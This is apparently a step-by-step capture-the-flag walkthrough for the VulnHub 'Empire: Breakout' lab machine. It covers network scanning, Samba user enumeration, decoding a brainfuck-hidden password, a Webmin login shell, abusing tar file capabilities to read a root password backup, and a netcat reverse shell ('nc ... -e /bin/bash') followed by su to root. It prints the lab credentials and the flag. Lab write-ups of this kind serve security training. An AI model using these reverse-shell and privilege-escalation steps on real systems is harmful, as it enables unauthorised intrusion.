Machine Link : https://www.vulnhub.com/entry/empire-breakout,751/
step1 : arp-scan -l ---to get the ip
step2 : nmap -T4 -sSV -p- 192.168.0.188 -Pn -A
FINDING
80/tcp open http Apache httpd 2.4.51 ((Debian))
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
20000/tcp open http MiniServ 1.830 (Webmin httpd)
step3 : enum4linux -a 192.168.0.188
FINDING
S-1-22-1-1000 Unix User\cyber (Local User) ---- user name is cyber
step4 : Open ip in browser and go to view source
FINDING
++++++++++[+++++++++++++++++++++-]++++++++++++++++. ++++.+++++++++++++++++.----.++++++++++.-----------.-----------.++++.+.-.--------. ++++++++++++++++++++.------------.---------.++++++.++++++.
It is brainfuck cypher and can be decrypt from https://www.dcode.fr/brainfuck-language
the password is ".2uqPEfj3DPa-3"
step5 : open http://192.168.0.188:10000/ and type the user id: cyber and pwd: .2uqPEfj3DPa-3
step6 : At bottom on left blue menu u will get shell _ click it and open
step7 : ls -la ull will find tar file -- getcap -r / 2/dev/null -- to know the capability of tar file
step8 : ls -la /var/backups
FINDING
old_pass.bak
step9 : ./tar -cf pass.tar /var/backups/.old_pass.bak
step10 : ./tar -xf pass.tar
step11 : on attacker terminal open a shell with nc -nvlp 4444
step12 : on victem terminal nc 192.168.0.106 4444 -e /bin/bash -- and hit enter
step13 : ls then cat pass.tar -- ull get the password for root Ts&4&YurgtRX(=~h
step14 : su root and type the password
step15 : whoami -- ull be root then cd root then ls ull find rOOt.txt the less rOOt.txt (cat may
not work)
FINDING
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
Author: Icex64 & Empire Cybersecurity
|